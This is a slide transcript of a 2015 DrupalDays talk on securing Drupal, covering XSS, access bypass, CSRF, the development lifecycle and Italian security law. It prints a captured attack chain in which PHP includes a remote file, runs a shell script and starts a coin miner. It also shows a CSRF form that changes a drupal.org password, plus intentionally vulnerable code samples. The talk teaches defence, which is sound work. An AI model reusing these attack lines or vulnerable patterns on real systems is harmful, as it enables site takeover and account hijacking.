secure drupal, from start to finish
TRANSCRIPT
© Ibuildings 2014/2015 - All rights reserved
#DrupalDaysEU
Secure Drupal From start to finish
© Ibuildings 2014/2015 - All rights reserved
Speaker InfoBoy BaukemaSecurity Specialist
[email protected]@relaxnow
•
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
• Security Specialist
• R&D Security
• Internal & External
• Security Training
• Consulting
• Security Audits
A Security what?
© Ibuildings 2014/2015 - All rights reserved
This is the Talk Title and it could be very long, for example on two lines or more
© Ibuildings 2014/2015 - All rights reserved
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
Gold Sponsors
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
/usr/sbin/apache2 -‐k start \_ /usr/sbin/apache2 -‐k start \_ /usr/local/php539/bin/php-‐cgi -‐dauto_prepend_file=http://XXX.XXX.XXX.XXX/one.txt -‐dallow_url_include=on \_ sh -‐c /tmp/sh.sh \_ ./minerd -‐a scrypt -‐o stratum+tcp://multi.ghash.io:3333 -‐u lscllc.worker16 -‐p x
Such hacked. Much coins.
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
[20:51:04] root@bal-‐XXXX.prod:/var/log/nginx# zgrep "POST / HTTP/1.1" access.log | egrep -‐o 'forwarded_for="[^\s,"]+?' | cut -‐d'"' -‐f2 | sort | uniq -‐c | sort -‐nr | head -‐30 2112 104.130.25.XXX 1144 37.221.162.XXX 1067 185.13.37.XXX 1066 77.247.181.XXX 1058 77.109.141.XXX 1047 5.135.158.XXX 1042 178.175.139.XXX
HTTP Flood
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
Gold Sponsors
•
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
• Drupal Top 3
• Secure Development Lifecycle
• The Law
The Plan
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
// to expand it out into a comma-delimited set of placeholders.foreach (array_filter($args, 'is_array') as $key => $data) { $new_keys = array(); foreach ($data as $i => $value) { // This assumes that there are no other placeholders that use the same // name. For example, if the array placeholder is defined as :example // and there is already an :example_2 placeholder, this will generate
/includes/database/database.inc
© Ibuildings 2014/2015 - All rights reserved
This is the Talk Title and it could be very long, for example on two lines or more
Source: http://drupalsecurityreport.org/sites/g/files/g598426/f/201403/drupal-security-whitepaper-1-3.pdf
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
/*** Preprocess function to replace the regular label with the * display label*/function field_display_label_preprocess_field(&$variables) { $field = field_info_instance(...); if ( isset($field['display_label']) && strlen(trim($field['display_label'])) > 0 ) { $variables['label'] = $field['display_label'];
1. XSS
From: http://cgit.drupalcode.org/field_display_label/tree/field_display_label.module?id=e7f54e1ee44cd6f0fdbc16ac81f2cfb13f3d3d67
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
1. drupal_set_message
2. l
3. watchdog
Which function(s) should receive check_plain() content
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
1. drupal_set_message
2. l
3. watchdog
Which function(s) should receive check_plain() content
Use t('@') syntax!
$text = t( "@name's blog", [ '@name' => format_username($account) ]);
© Ibuildings 2014/2015 - All rights reserved
Filter Input As early as possible
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
$_GET, $_POST, $_REQUEST, $_COOKIE, $_SERVER, $_FILES, $argv
everything from the database
$form_state (mostly ['input'])argdrupal_get_query_parametersdrupal_current_script_urldrupal_detect_baseurlrequest_path
What is input?
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
Sanitize: $id = (int) arg(1); $accountEnabled = (bool) arg(1);
Validate: Form validators in_array() mb_strlen() > 1024 url_is_external valid_url
Filter / Sanitize / Validate
© Ibuildings 2014/2015 - All rights reserved
Encode Output As late as possible
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
Gold Sponsors
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
// This is to be accessible to all users, // so 'access callback' can be set// to TRUE, meaning that we should // bypass all access checks.
'access callback' => TRUE,
2. Access Bypass
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
global $user;
if ($user->uid = 1) { watchdog('mymodule', request_uri());}
A disturbance in the force
•
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
• IDE / code sniffer (coder tools) • if (1 = $uid) • === instead of == • user_uid_optional_load($uid = NULL)
Avoiding accidental assign
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
<form action="http://mysite.com/contact" method="post" />
3. Cross Site Request Forgery
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
<form action="https://www.drupal.org/user/2457520/edit" method="post"> <input type="hidden" name="pass[pass1]" value="hacked1" />
3. Cross Site Request Forgery
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
<script>$('#contactform').submit(); </script>
3. Cross Site Request Forgery
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
Gold Sponsors
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
=> drupal_get_token
<= drupal_valid_token
Drupal Forms to the rescue!
•
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
• Authentication / Session
• Arbitrary Code Execution
• Denial of Service
• Information Disclosure
• Logic error
• Open Redirect
• Password Protection Bypass
• Session Fixation
• SQL Injection
• ....
4. Others
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
Gold Sponsors
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
Gold Sponsors
© Ibuildings 2014/2015 - All rights reserved
This is the Talk Title and it could be very long, for example on two lines or more
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
1. Education & Guidance
•
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
• Threat Assessment
• Security Requirements
2. Design time security
•
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
• Architecture Review
• Code Review
3. Security Review
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
4. Security Testing
The OWASP Application Security Verification Standard (ASVS) Project
provides a basis for testing web application technical security
controls.
•
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
• Identify third party dependencies
• ... follow their Security Mailinglists
• Make rebuilding painless.
• Make redeploying painless.
• Backup & restore from backup 'regularly'
5. Vulnerability Management
© Ibuildings 2014/2015 - All rights reserved
This is the Talk Title and it could be very long, for example on two lines or more
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
Gold Sponsors
© Ibuildings 2014/2015 - All rights reserved
The Law
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
the penalty for failure to adopt the minimum measures is that of Article 169 of the Code (imprisonment up to two years);
damages -the manager has the burden of proof that he took all that was possible to avoid the damage, referring to appropriate practice known techniques of computer security , while the victim must only prove the existence of damage.
Misure minime di sicurezza
•
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
• Individually associated accounts
• > 8 character passwords
• Changed every 3 to 6 months
• Do not leave admin unattended
• Privileges on need to know basis
• Verify privileges at least yearly
• Update at least every 6 months
• Backup data at least weekly
Disciplinare tecnico
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
Gold Sponsors
Bob's Story
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
ResponsibleDisclosure
•
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
• Know your law
• Think like an attacker
• ... but don't become one (without permission)
• Make sure white hats have a place to go
• Filter Input, Encode Output
• Train your developers
• Design with security in mind
• Review and be critical
• Trust but verify that you are secure
• Perform active automated maintenance
In summary
•
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
• http://www.slideshare.net/relaxnow/drupaldays-2015
• http://crackingdrupal.com
• http://drupalsecurityreport.com
• http://drupal.org/writing-secure-code
• http://owasp.org
• OWASP ASVS
The End